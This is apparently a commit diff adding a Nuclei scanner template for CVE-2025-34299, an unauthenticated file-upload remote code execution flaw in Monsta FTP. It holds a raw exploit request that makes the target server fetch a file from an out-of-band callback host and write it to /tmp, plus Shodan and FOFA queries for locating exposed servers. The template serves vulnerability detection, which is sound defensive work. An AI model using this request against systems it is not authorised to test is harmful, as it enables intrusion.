|
| 1 | +id: CVE-2025-34299 |
| 2 | + |
| 3 | +info: |
| 4 | + name: Monsta FTP <= 2.11.2 - Unauthenticated Remote Code Execution |
| 5 | + author: KrE80r |
| 6 | + severity: critical |
| 7 | + description: | |
| 8 | + Monsta FTP = 2.11 contains an unrestricted file upload vulnerability caused by lack of authentication on file uploads, letting unauthenticated attackers execute arbitrary code by uploading crafted files. |
| 9 | + impact: | |
| 10 | + Unauthenticated attackers can upload malicious files to execute arbitrary code, potentially compromising the server. |
| 11 | + remediation: | |
| 12 | + Update to the latest version beyond 2.11. |
| 13 | + reference: |
| 14 | + - https://labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/ |
| 15 | + - https://github.com/advisories/GHSA-42m5-3r2p-wr92 |
| 16 | + - https://nvd.nist.gov/vuln/detail/CVE-2025-34299 |
| 17 | + classification: |
| 18 | + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 19 | + cvss-score: 9.8 |
| 20 | + cve-id: CVE-2025-34299 |
| 21 | + cwe-id: CWE-434 |
| 22 | + metadata: |
| 23 | + verified: true |
| 24 | + max-request: 2 |
| 25 | + vendor: monstaftp |
| 26 | + product: monsta_ftp |
| 27 | + shodan-query: http.title:"Monsta FTP" |
| 28 | + fofa-query: title="Monsta FTP" |
| 29 | + tags: cve,cve2025,monsta,ftp,rce,unauth,file-upload,intrusive,oast,oob,kev,vkev |
| 30 | + |
| 31 | +flow: http(1) && http(2) |
| 32 | + |
| 33 | +http: |
| 34 | + - method: GET |
| 35 | + path: |
| 36 | + - "{{BaseURL}}/mftp/" |
| 37 | + - "{{BaseURL}}/" |
| 38 | + |
| 39 | + stop-at-first-match: true |
| 40 | + |
| 41 | + host-redirects: true |
| 42 | + max-redirects: 2 |
| 43 | + |
| 44 | + matchers: |
| 45 | + - type: dsl |
| 46 | + dsl: |
| 47 | + - 'status_code == 200' |
| 48 | + - 'contains(body, "MonstaFTP")' |
| 49 | + condition: and |
| 50 | + internal: true |
| 51 | + |
| 52 | + extractors: |
| 53 | + - type: regex |
| 54 | + name: version |
| 55 | + group: 1 |
| 56 | + regex: |
| 57 | + - 'monsta-min-([0-9.]+)\.js' |
| 58 | + internal: true |
| 59 | + |
| 60 | + - raw: |
| 61 | + - | |
| 62 | + POST {{BaseURL}}/mftp/application/api/api.php HTTP/1.1 |
| 63 | + Host: {{Hostname}} |
| 64 | + Content-Type: application/x-www-form-urlencoded |
| 65 | +
|
| 66 | + request={"connectionType":"ftp","configuration":{"host":"{{interactsh-url}}","username":"nuclei-oast","initialDirectory":"/","password":"test","port":21},"actionName":"downloadFile","context":{"remotePath":"/test.txt","localPath":"/tmp/nuclei-oast-test.txt"}} |
| 67 | +
|
| 68 | + matchers-condition: and |
| 69 | + matchers: |
| 70 | + - type: word |
| 71 | + part: interactsh_protocol |
| 72 | + words: |
| 73 | + - "dns" |
| 74 | + |
| 75 | + - type: dsl |
| 76 | + dsl: |
| 77 | + - 'compare_versions(version, "<= 2.11.2")' |
| 78 | + |
| 79 | + extractors: |
| 80 | + - type: kval |
| 81 | + kval: |
| 82 | + - version |
0 commit comments